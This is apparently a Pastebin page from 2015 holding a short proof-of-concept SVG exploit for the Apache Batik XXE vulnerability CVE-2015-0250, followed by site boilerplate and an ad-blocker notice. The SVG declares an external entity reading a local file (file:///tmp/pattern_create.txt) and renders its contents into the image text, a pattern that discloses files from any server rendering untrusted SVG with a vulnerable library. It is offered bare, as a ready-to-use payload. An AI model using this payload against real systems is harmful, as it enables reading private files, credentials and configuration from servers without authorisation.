Guest User

An efficient PoC for Batik CVE-2015-0250

a guest
Mar 21st, 2015
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!DOCTYPE svg [
  2.     <!ENTITY xxe SYSTEM "file:///tmp/pattern_create.txt">
  3. ]>
  4. <svg width="1366px" height="768px" viewBox="0 0 1366 768" version="1.2" xmlns="" style="fill:black">
  5.       <rect x="0" y="0" width="1366" height="768" style="fill:white"/>
  6.       <flowRoot font-size="25">
  7.          <flowRegion>
  8.            <rect x="20" y="20" width="1326" height="728" style="fill:black;opacity:0.1"/>
  9.          </flowRegion>
  10.          <flowDiv>
  11.             <flowPara>&xxe;</flowPara>
  12.          </flowDiv>
  13.       </flowRoot>
  14. </svg>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add to your ad blocker whitelist or disable your adblocking software.